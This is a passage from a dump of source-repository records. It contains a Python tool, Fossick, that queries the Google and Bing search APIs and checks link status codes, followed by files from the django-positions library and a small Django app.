"max_line_length": 163,
"num_lines": 267,
"path": "/fossick.py",
"repo_name": "parmaviolet/fossick",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\n\"\"\"\nFossick v1.0\n\"\"\"\n\nimport argparse\nimport asyncio\nimport csv\nimport logging\nimport os\nimport sys\n\nimport aiofiles\nimport aiohttp\nimport requests\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\n\nPARSER = argparse.ArgumentParser(description='Tool to perform search engine(s) query and return HTTP status of found links')\nPARSER.add_argument('--verbose', '-v', action='store_true', help='increase output verbosity')\n\n# Default arguments\nGROUP_DEFAULT = PARSER.add_argument_group('Default')\nGROUP_DEFAULT.add_argument('--download', '-d', action='store_true', required=False, help='download the link contents locally')\nGROUP_DEFAULT.add_argument('--search-query', '-s', required=True, help='search query to be used')\nGROUP_DEFAULT.add_argument('--write-csv', '-w', required=False, default='fossick-results.csv', help='output results to a CSV file (default filename: %(default)s)')\n\n# Google arguments\nGROUP_GOOGLE = PARSER.add_argument_group('Google Search Engine')\nGROUP_GOOGLE.add_argument('--google-api', '-ga', required=False, help='Google API key')\nGROUP_GOOGLE.add_argument('--google-cse', '-gc', required=False, help='Google CSE ID')\n\n# Bing arguments\nGROUP_BING = PARSER.add_argument_group('Bing Search Engine')\nGROUP_BING.add_argument('--bing-key', '-bk', required=False, help='Bing subscription key')\n\n\nARGS = PARSER.parse_args(args=None if sys.argv[1:] else ['--help'])\n\nif (not ARGS.google_api or not ARGS.google_cse) and not ARGS.bing_key:\n PARSER.error('at least one search engine must be configured')\n\nverbose_print = print if ARGS.verbose else lambda *a, **k: None\nlogging.basicConfig(format='%(message)s', level=logging.INFO, stream=sys.stderr)\nlogging.getLogger('googleapicliet.discovery_cache').setLevel(logging.ERROR)\n\n\ndef google_search(search_term, api_key, cse_id, **kwargs):\n \"\"\" Perform Google search using search term\n\n Args:\n search_term ([str]): Google search term string\n api_key ([str]): Google API Key value\n cse_key ([str]): Google CSE Key value\n\n Returns:\n response [str]: JSON search object result\n \"\"\"\n try:\n # https://developers.google.com/custom-search/v1/reference/rest/v1/cse/list\n # Due to API limiting to 10 results returned and a max limit of 100 we loop through till we hit that value\n results = []\n for start in range(1, 100, 10):\n service = build('customsearch', 'v1', developerKey=api_key, cache_discovery=False)\n response = service.cse().list(q=search_term, cx=cse_id, start=start, **kwargs).execute() # pylint: disable=no-member\n\n if response.get('items'):\n results.append({\n 'items': response.get('items')\n })\n else:\n break\n\n verbose_print(f'\\t[d]{results}')\n return results\n except HttpError as e:\n logging.error(f\"[!] 
Error response from Google Search API - likely incorrect key value(s)\")\n verbose_print(f'\\t[d]{e}')\n return ''\n\n\ndef extract_google_urls(results):\n \"\"\" Extracts URL links from the result JSON\n\n Args:\n results ([str]): JSON search results\n\n Returns:\n results_list ([list]): List of URL links parsed\n \"\"\"\n results_list = []\n\n for result in results:\n items = result.get('items')\n\n for item in items:\n results_list.append(item.get('link'))\n\n return results_list\n\n\ndef bing_search(search_term, sub_key):\n \"\"\" Perform Bing search using search term\n\n Args:\n search_term ([str]): Bing search term string\n sub_key ([str]): Bing subscription key\n\n Returns:\n response [str]: JSON search object results\n \"\"\"\n endpoint = \"https://api.bing.microsoft.com/v7.0/search\"\n params = {\n 'q': search_term,\n 'count': 50\n }\n headers = {'Ocp-Apim-Subscription-Key': sub_key}\n\n try:\n results = []\n response = requests.get(endpoint, headers=headers, params=params)\n results.append({'webPages': response.json().get('webPages')})\n verbose_print(f'\\t[d]{response.text}')\n\n totalMatches = response.json().get('webPages').get('totalEstimatedMatches')\n\n for offset in range(50, totalMatches, 50):\n # more results to query - update params with offset for next pages\n params = {\n 'q': search_term,\n 'count': 50,\n 'offset': offset\n }\n\n response = requests.get(endpoint, headers=headers, params=params)\n results.append({'webPages': response.json().get('webPages')})\n\n return results\n except Exception:\n logging.error(f\"[!] Error response from Bing Search API - likely incorrect key value(s)\")\n return ''\n\n\ndef extract_bing_urls(results):\n \"\"\" Extracts URL links from the result JSON\n\n Args:\n results ([str]): JSON search results\n\n Returns:\n results_list ([list]): List of URL links parsed\n \"\"\"\n results_list = []\n\n for web_page in results:\n links = web_page.get('webPages')\n\n for item in links.get('value'):\n results_list.append(item.get('url'))\n\n return results_list\n\n\nasync def check_url_status(session, search_engine, url):\n \"\"\" Check status of the URL link provided\n\n Args:\n session ([aiohttp.ClientSession]): aiohttp session\n search_engine ([str]): search engine string\n url ([str]): url link string\n\n Returns:\n [type]: [description]\n \"\"\"\n async with session.get(url) as response:\n http_code = response.status\n\n if response.status == 200 and ARGS.download:\n f = await aiofiles.open(os.path.basename(url), mode='wb')\n await f.write(await response.read())\n await f.close()\n\n return {'search_engine': search_engine, 'url': url, 'http_code': http_code}\n\n\nasync def check_all_urls(urls, search_engine):\n \"\"\" Async function for checking status of URL links\n\n Args:\n urls ([str]): list of URLs\n search_engine ([str]): search engine string\n\n Returns:\n [dict]: returns list of dictionaries\n \"\"\"\n async with aiohttp.ClientSession() as session:\n tasks = []\n\n for url in urls:\n tasks.append(\n check_url_status(\n session,\n search_engine,\n url\n )\n )\n\n responses = await asyncio.gather(*tasks, return_exceptions=True)\n return responses\n\n\ndef save_output_csv(filename, search_results):\n try:\n with open(filename, mode='w') as csv_file:\n field_names = ['search_engine', 'url', 'http_code']\n writer = csv.DictWriter(csv_file, fieldnames=field_names)\n writer.writeheader()\n writer.writerows(search_results)\n except OSError as e:\n logging.error(f'[!] 
Error creating CSV file {filename} - debug info: {e}')\n\n\ndef main():\n \"\"\" \n Main function\n \"\"\"\n logging.info(f\"[i] Fossick v1.0\")\n verbose_print(f\"Command inputs: {ARGS}\")\n\n # Create empty list to store all results\n results = []\n\n # Google Search API\n if ARGS.google_api and ARGS.google_cse:\n google_search_results = google_search(ARGS.search_query, ARGS.google_api, ARGS.google_cse)\n\n if google_search_results:\n google_search_urls = extract_google_urls(google_search_results)\n results.extend(asyncio.run(check_all_urls(google_search_urls, 'Google')))\n\n # Bing Search API\n if ARGS.bing_key:\n bing_search_results = bing_search(ARGS.search_query, ARGS.bing_key)\n if bing_search_results:\n bing_search_urls = extract_bing_urls(bing_search_results)\n results.extend(asyncio.run(check_all_urls(bing_search_urls, 'Bing')))\n\n if results:\n # Print to console\n for item in results:\n search_engine = item.get('search_engine')\n url = item.get('url')\n http_code = item.get('http_code')\n logging.info(f'[i] Found Link: {url} \\n\\tStatus: HTTP {http_code} \\n\\tSearch Engine: {search_engine}')\n\n # Save to CSV file\n if ARGS.write_csv:\n filename = ARGS.write_csv\n save_output_csv(filename, results)\n logging.info(f'[i] Successfully saved output to {filename}')\n else:\n logging.info(\"[i] No results returned\")\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6772673726081848,
"alphanum_fraction": 0.6778563261032104,
"avg_line_length": 29.872726440429688,
"blob_id": "11602e185927303b03bc11b71be68de3679f255f",
"content_id": "93e1ebdbaccfd5f6b11a455ef800bd6f73dfe550",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1698,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 55,
"path": "/README.md",
"repo_name": "parmaviolet/fossick",
"src_encoding": "UTF-8",
"text": "# Fossick\n\nFossick is a tool to query search engine APIs.\n\nIt returns link results and the HTTP status codes for each link.\n\n---\n\n## Search Engine Support\n\nThe following search engines are currently supported:\n\n* Bing\n* Google\n\nTo create the relevent key(s) required for the search engine use with the tool, follow the guides below.\n\n* [Bing Search API](https://docs.microsoft.com/en-us/azure/cognitive-services/bing-web-search/quickstarts/python)\n* [Google Search API](https://developers.google.com/webmaster-tools/search-console-api-original/v3/quickstart/quickstart-python)\n\n## Useage\n\nPrint the help with `python fossick.py -h`.\n\n```text\noptional arguments:\n -h, --help show this help message and exit\n --verbose, -v increase output verbosity\n\nDefault:\n --download, -d download the link contents locally\n --search-query SEARCH_QUERY, -s SEARCH_QUERY\n search query to be used\n --write-csv, -w output results to a CSV file (optionally specify filename)\n\nGoogle Search Engine:\n --google-api GOOGLE_API, -ga GOOGLE_API\n Google API key\n --google-cse GOOGLE_CSE, -gc GOOGLE_CSE\n Google CSE ID\n\nBing Search Engine:\n --bing-key BING_KEY, -bk BING_KEY\n Bing subscription key\n```\n\n### Examples\n\nRun query against Bing and Google search engines and write results to CSV file.\n\n`./fossick.py -s 'test query' -ga '<google-api-key>' -gc '<google-cse-id>' -bk '<bing-sub-key>' -w [outputfile.csv]`\n\nRun query against Bing and Google search engines and download files locally.\n\n`./fossick.py -s 'test query' -ga '<google-api-key>' -gc '<google-cse-id>' -bk '<bing-sub-key>' -d`\n"
}
] | 2 |
elec/django-positions | https://github.com/elec/django-positions | 472358e51bdcbfb1ff9531522fd2f44d92aacab5 | 1ee904ccfc82679d630cbab4358c5d6cc763f6df | ca92808bd8ee69d2ecbbebd541ca00c29f7969a3 | refs/heads/master | 2021-07-04T18:53:07.431938 | 2018-12-18T20:00:46 | 2018-12-18T20:00:46 | 162,121,295 | 0 | 0 | NOASSERTION | 2018-12-17T11:36:37 | 2020-07-13T19:32:41 | 2020-07-13T19:31:26 | Python | [
{
"alpha_fraction": 0.7556818127632141,
"alphanum_fraction": 0.7594696879386902,
"avg_line_length": 32,
"blob_id": "85128e6f857932d7e5c5ebcb9fe085cde6d33332",
"content_id": "6d7a3f17a97bebe6ed1fff6d62885d4d43149a46",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 528,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 16,
"path": "/positions/examples/generic/models.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes import generic\nfrom django.db import models\n\nfrom positions.fields import PositionField\n\n\nclass GenericThing(models.Model):\n name = models.CharField(max_length=80)\n object_id = models.PositiveIntegerField()\n content_type = models.ForeignKey(ContentType)\n content_object = generic.GenericForeignKey()\n position = PositionField(collection=('object_id', 'content_type'))\n\n def __unicode__(self):\n return self.name\n"
},
{
"alpha_fraction": 0.774193525314331,
"alphanum_fraction": 0.774193525314331,
"avg_line_length": 30,
"blob_id": "f03f313b757b92a2b8f088eba05df4e2bc64430e",
"content_id": "6315748f24abda25612d42dc896f09b14fea32f2",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 1,
"path": "/positions/examples/ci_settings_sqlite.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from .settings_sqlite import *\n"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.6800000071525574,
"avg_line_length": 32.33333206176758,
"blob_id": "be808a5c2259b179cea629acf346fbe41fd69b57",
"content_id": "9c85978b13d95120915d356ea0dfd1e037f89dec",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 100,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 3,
"path": "/positions/examples/ci_settings_postgres.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from .settings_postgres import *\n\nDATABASES['default'].update({'USER': 'postgres', 'PASSWORD': ''})\n"
},
{
"alpha_fraction": 0.6656678318977356,
"alphanum_fraction": 0.6780821681022644,
"avg_line_length": 43.92307662963867,
"blob_id": "589260832e46e9fa391cc9d9892ddc638ca19d4d",
"content_id": "05ed9181cf4b857f1e09e297314325d3d0a4f2ee",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2336,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 52,
"path": "/positions/examples/generic/tests.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "import doctest\nimport unittest\n\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom positions.examples.lists.models import List\nfrom positions.examples.generic.models import GenericThing\n\nfrom django.test import TestCase\n\nclass GenericTestCase(TestCase):\n def setUp(self):\n pass\n\n def tearDown(self):\n GenericThing.objects.all().delete()\n ContentType.objects.all().delete()\n List.objects.all().delete()\n\n # @unittest.skip(\"Some reason. If you are reading this in a test run someone did not fill this in.\")\n def test_doctests_standin(self):\n # This code just contains the old doctests for this module. They should be most likely split out into their own\n # tests at some point.\n self.l = List.objects.create(name='To Do')\n self.ct = ContentType.objects.get_for_model(self.l)\n self.t1 = GenericThing.objects.create(name=\"First Generic Thing\", object_id=self.l.pk, content_type=self.ct)\n\n self.t2 = GenericThing.objects.create(name=\"Second Generic Thing\", object_id=self.l.pk, content_type=self.ct)\n self.assertEquals(self.t1.position, 0)\n self.assertEquals(self.t2.position, 1)\n self.t1.position = 1\n self.t1.save()\n\n self.assertEquals(self.t1.position, 1)\n self.t2 = GenericThing.objects.get(pk=2)\n self.assertEquals(self.t2.position, 0)\n self.t1.delete()\n\n actual_order = list(GenericThing.objects.filter(object_id=self.l.pk, content_type=self.ct).values_list('name', 'position').order_by('position'))\n expected_order = [(u'Second Generic Thing', 0)]\n self.assertEqual(actual_order, expected_order)\n self.t3 = GenericThing.objects.create(object_id=self.l.pk, content_type=self.ct, name='Mr. None')\n self.t3.save()\n self.assertEquals(self.t3.position, 1)\n self.t4 = GenericThing.objects.create(object_id=self.l.pk, content_type=self.ct, name='Mrs. None')\n self.assertEquals(self.t4.position, 2)\n self.t4.position = -2\n self.t4.save()\n self.assertEquals(self.t4.position, 1)\n actual_order = list(GenericThing.objects.order_by('position').values_list('name', flat=True))\n expected_order = [u'Second Generic Thing', u'Mrs. None', u'Mr. None']\n self.assertEqual(actual_order, expected_order)\n"
},
{
"alpha_fraction": 0.7104166746139526,
"alphanum_fraction": 0.71875,
"avg_line_length": 27.235294342041016,
"blob_id": "3e1a1b4ea83606847435bfd4445fbd69fa2bd63a",
"content_id": "a4baff432db4b66a8e4788cbddc233e67667be80",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 480,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 17,
"path": "/positions/examples/todo/models.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nimport positions\n\n\nclass Item(models.Model):\n description = models.CharField(max_length=50)\n\n # I'm calling the PositionField \"index\" to make sure any internal code that\n # relies on a PositionField being called \"position\" will break.\n # https://github.com/jpwatts/django-positions/pull/12\n index = positions.PositionField()\n\n objects = positions.PositionManager('index')\n\n def __unicode__(self):\n return self.description\n"
},
{
"alpha_fraction": 0.4642857015132904,
"alphanum_fraction": 0.6785714030265808,
"avg_line_length": 13,
"blob_id": "5b3a02462af9ce492e841b8fdeaf76f2ca4a61cd",
"content_id": "d4ef6ee9e27fc27a44b269155ab9df08039bdb98",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 28,
"license_type": "permissive",
"max_line_length": 13,
"num_lines": 2,
"path": "/requirements.txt",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "Django==1.7.4\npsycopg2==2.6\n"
},
{
"alpha_fraction": 0.8888888955116272,
"alphanum_fraction": 0.8888888955116272,
"avg_line_length": 44,
"blob_id": "26cb4fbd768405ef0529a12207aec4b94abd8726",
"content_id": "4de1f3eb9f6d4b49df09cc20f3947939e0e8bd94",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 90,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 2,
"path": "/positions/__init__.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from positions.fields import PositionField\nfrom positions.managers import PositionManager\n"
},
{
"alpha_fraction": 0.592901885509491,
"alphanum_fraction": 0.6054279804229736,
"avg_line_length": 21.809524536132812,
"blob_id": "772ee42305e6e45127248b5bdd100d14491f27a1",
"content_id": "2e0c2ba09c362b3c4be90e6840813ccae4a37443",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 479,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 21,
"path": "/positions/examples/migration/migrations/0003_migrationtest_position.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport positions.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('migration', '0002_insert_test_data'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='migrationtest',\n name='position',\n field=positions.fields.PositionField(default=-1),\n preserve_default=True,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5627239942550659,
"alphanum_fraction": 0.5627239942550659,
"avg_line_length": 22.25,
"blob_id": "8fd6df389f7e63deb37c528cb80ee079f1bcd756",
"content_id": "f6c4f399fcbc8ad836f5530c1afa607cbd109e87",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 279,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 12,
"path": "/positions/examples/settings_mysql.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from .settings import *\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'django_positions',\n 'USER': 'django_positions',\n 'PASSWORD': 'django_positions',\n }\n}\n\nLOGGING['handlers']['debug_log_file']['formatter'] = 'simple'\n"
},
{
"alpha_fraction": 0.7464028596878052,
"alphanum_fraction": 0.7553957104682922,
"avg_line_length": 29.94444465637207,
"blob_id": "dc039893513761d7c4ed90e216ddde97af45bd0d",
"content_id": "1a10010457d283854a7a2dd101bbddf1838a91a8",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 556,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 18,
"path": "/positions/examples/migration/models.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n# Create your models here.\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes import generic\nfrom django.db import models\n\nfrom positions.fields import PositionField\n\n\nclass MigrationTest(models.Model):\n name = models.CharField(max_length=80)\n age = models.IntegerField(null=True, blank=True)\n favorite_color = models.CharField(max_length=255, null=True, blank=True)\n position = PositionField(collection=('name', 'age'))\n\n def __unicode__(self):\n return self.name"
},
{
"alpha_fraction": 0.6763803958892822,
"alphanum_fraction": 0.6871165633201599,
"avg_line_length": 28.545454025268555,
"blob_id": "33086d821ffb2c2f20c1ca06cb07737e89820581",
"content_id": "a2a7da2d3a52fbd3db7d32ebbec7969997024d2c",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 652,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 22,
"path": "/positions/examples/migration/migrations/0002_insert_test_data.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport positions.fields\n\n\ndef add_test_data(apps, schema_editor):\n # We can't import the Person model directly as it may be a newer\n # version than this migration expects. We use the historical version.\n MigrationTest = apps.get_model(\"migration\", \"MigrationTest\")\n test_record = MigrationTest.objects.create(name='Test Name', age=99, favorite_color='Red')\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('migration', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(add_test_data),\n ]\n\n\n"
},
{
"alpha_fraction": 0.7364400029182434,
"alphanum_fraction": 0.7377132773399353,
"avg_line_length": 37.5,
"blob_id": "4a6d94f16b016c6d73bffddc8b2eda391041ed3b",
"content_id": "d5677396030b5a725bef4bd639e3bc87be8db148",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3927,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 102,
"path": "/README.rst",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "================\nDjango Positions\n================\n\n\n.. image:: https://travis-ci.org/jpwatts/django-positions.svg?branch=master\n :target: https://travis-ci.org/jpwatts/django-positions\n\n\nThis module provides ``PositionField``, a model field for `Django`_ that allows\ninstances of a model to be sorted by a user-specified position. Conceptually,\nthe field works like a list index: when the position of one item is changed, the\npositions of other items in the collection are updated in response.\n\n\nUsage\n-----\n\nAdd a ``PositionField`` to your model; that's just about it.\n\nIf you want to work with all instances of the model as a single collection,\nthere's nothing else required. To create collections based on one or more\nfields on the model, specify the field names using the ``collection`` argument.\n\nThe apps in ``positions.examples`` demonstrate the ``PositionField`` API.\n\n\nIndices\n~~~~~~~\n\nIn general, the value assigned to a ``PositionField`` will be handled like a\nlist index, to include negative values. Setting the position to ``-2`` will\ncause the item to be moved to the second position from the end of collection --\nunless, of course, the collection has fewer than two elements.\n\nBehavior varies from standard list indices when values greater than or less than\nthe maximum or minimum positions are used. In those cases, the value is handled\nas being the same as the maximum or minimum position, respectively. ``None`` is\nalso a special case that will cause an item to be moved to the last position in\nits collection.\n\nBulk updates\n~~~~~~~~~~~~\n\nThe `PositionManager` custom manager uses `PositionQuerySet` to provide a\n`reposition` method that will update the position of all objects in the\nqueryset to match the current ordering. If `reposition` is called on the\nmanager itself, all objects will be repositioned according to the default\nmodel ordering.\n\nBe aware that, unlike repositioning objects one at a time using list indices,\nthe `reposition` method will call the `save` method of every model instance\nin the queryset.\n\nMany-to-many\n~~~~~~~~~~~~\n\nSpecifying a ``ManyToManyField`` as a ``collection`` won't work; use an\nintermediate model with a ``PositionField`` instead::\n\n class Product(models.Model):\n name = models.CharField(max_length=50)\n\n class Category(models.Model):\n name = models.CharField(max_length=50)\n products = models.ManyToManyField(Product, through='ProductCategory', related_name='categories')\n\n class ProductCategory(models.Model):\n product = models.ForeignKey(Product)\n category = models.ForeignKey(Category)\n position = PositionField(collection='category')\n\n class Meta(object):\n unique_together = ('product', 'category')\n\n\nMulti-table model inheritance\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nBy default, if a parent model has a position field that declares a collection,\nchild model instances are ordered independently. This behavior can be changed\nby specifying a `parent_link` argument identifying the name of the one-to-one\nfield linking the child model to the parent. If `parent_link` is set, all subclass\ninstances will be part of a single sequence in each collection.\n\n\nLimitations\n-----------\n\n* Unique constraints can't be applied to ``PositionField`` because they break\n the ability to update other items in a collection all at once. 
This one was\n a bit painful, because setting the constraint is probably the right thing to\n do from a database consistency perspective, but the overhead in additional\n queries was too much to bear.\n\n* After a position has been updated, other members of the collection are updated\n using a single SQL ``UPDATE`` statement, this means the ``save`` method of the\n other instances won't be called. As a partial work-around to this issue,\n any ``DateTimeField`` with ``auto_now=True`` will be assigned the current time.\n\n\n.. _`Django`: http://www.djangoproject.com/\n"
},
{
"alpha_fraction": 0.6559139490127563,
"alphanum_fraction": 0.6559139490127563,
"avg_line_length": 30,
"blob_id": "be5527ec1e4b4cd326d2bee5edd47384062f295c",
"content_id": "c0dab5d0d337004c2dfe0b47a807fe87d72361cd",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 3,
"path": "/positions/examples/ci_settings_mysql.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from .settings_mysql import *\n\nDATABASES['default'].update({'USER': 'root', 'PASSWORD': ''})\n"
}
] | 13 |
AlejandroOnofre/djangoApp | https://github.com/AlejandroOnofre/djangoApp | 253d2aa899a04d6244a4607d8db58d031bf9fa86 | 42f5201a71567ebf8cd3fadb0b068391f3548c9a | 0cdcab692bca726b461d0a614cf13eda73a543ec | refs/heads/master | 2020-05-04T18:09:31.231123 | 2019-04-05T00:34:05 | 2019-04-05T00:34:05 | 179,342,173 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.837837815284729,
"alphanum_fraction": 0.837837815284729,
"avg_line_length": 25.285715103149414,
"blob_id": "6a6f081efae1c1a266dd6e8db60917ce1e89ce3b",
"content_id": "7fad2ff2c8d362a2704f19379e4782a9ba17e58a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 185,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 7,
"path": "/general/tests.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "import json\n\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\n\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.test import APITestCase\n\n"
},
{
"alpha_fraction": 0.7635658979415894,
"alphanum_fraction": 0.7829457521438599,
"avg_line_length": 31.375,
"blob_id": "92175fb05245fe390a77eb2e1ca3e1e184a59c2a",
"content_id": "cef46aa2337ea827996643414ac29b3e05749df0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 258,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 8,
"path": "/company/models.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.conf import settings\n\n# Create your models here.\nclass Company(models.Model):\n\tname = models.CharField(max_length=250)\n\tphone_number = models.CharField(max_length=15)\n\taddress = models.TextField(blank=True, null=True)"
},
{
"alpha_fraction": 0.7808219194412231,
"alphanum_fraction": 0.7808219194412231,
"avg_line_length": 24.823530197143555,
"blob_id": "c041452c71af737557bfe62ebab6e47b3dab152f",
"content_id": "a59d5633ccbebca4ffd9bf32e0218370df7bd3e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 17,
"path": "/general/urls.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url, include\nfrom rest_framework import routers\n\nfrom general.views import UserViewSet#, ProfileViewSet\nfrom comments.views import CommentsViewSet\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', UserViewSet)\nrouter.register(r'comments', CommentsViewSet, base_name=\"comments\")\n#router.register(r'profile', ProfileViewSet)\n\napp_name='general'\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n]"
},
{
"alpha_fraction": 0.7439886927604675,
"alphanum_fraction": 0.7623762488365173,
"avg_line_length": 29.60869598388672,
"blob_id": "cad6e3462637d04629bb66f0818a1170ac1c2d1d",
"content_id": "d5316bc0d5b667e2660426c2bbc4a7871b4fd006",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 707,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 23,
"path": "/company/tests.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "import json\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\n\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.test import APITestCase\nfrom .models import Company\n\nfrom .serializers import CompanySerializer\n# Create your tests here.\n\nclass CompanyViewSetTestCase(APITestCase):\n\turl = 'http://127.0.0.1:8000/company/'\n\n\tdef test_company_get(self):\n\n\t\tnew_user = User.objects.create(username = \"newuser\", email = \"[email protected]\", password = \"newpass\")\n\t\tnew_token = Token.objects.create(user=new_user)\n\n\t\tself.client.credentials(HTTP_AUTHORIZATION='Bearer ' + new_token.key)\n\n\t\tresponse = self.client.get(self.url)\n\t\tself.assertEqual(200, response.status_code)\n\t\t\n"
},
{
"alpha_fraction": 0.7607973217964172,
"alphanum_fraction": 0.7607973217964172,
"avg_line_length": 22.230770111083984,
"blob_id": "487ac7945d062967270b30eb6b3fef598a2c69e0",
"content_id": "e86512a5934b20e2107a69995d5a91d177188aed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 301,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 13,
"path": "/comments/urls.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from comments.views import CommentsViewSet\nfrom rest_framework import routers\nfrom django.conf.urls import url, include\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'comments', CommentsViewSet, base_name=\"comments\")\n\napp_name = 'comments'\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n]"
},
{
"alpha_fraction": 0.5277777910232544,
"alphanum_fraction": 0.5902777910232544,
"avg_line_length": 17,
"blob_id": "ab1be923d361c10ad1b024452f00f3737bcde695",
"content_id": "22644115d2623ee0e9883de5cf1e77c7186a782d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 288,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 16,
"path": "/general/migrations/0003_delete_profile.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2 on 2019-04-04 23:41\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('general', '0002_profile_user'),\n ]\n\n operations = [\n migrations.DeleteModel(\n name='Profile',\n ),\n ]\n"
},
{
"alpha_fraction": 0.8097251653671265,
"alphanum_fraction": 0.8097251653671265,
"avg_line_length": 32.85714340209961,
"blob_id": "571e0cdd5a004e427a61e5902507316367080d07",
"content_id": "07dfa39058c4d7115f0716465de15cdf288c7f3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 473,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 14,
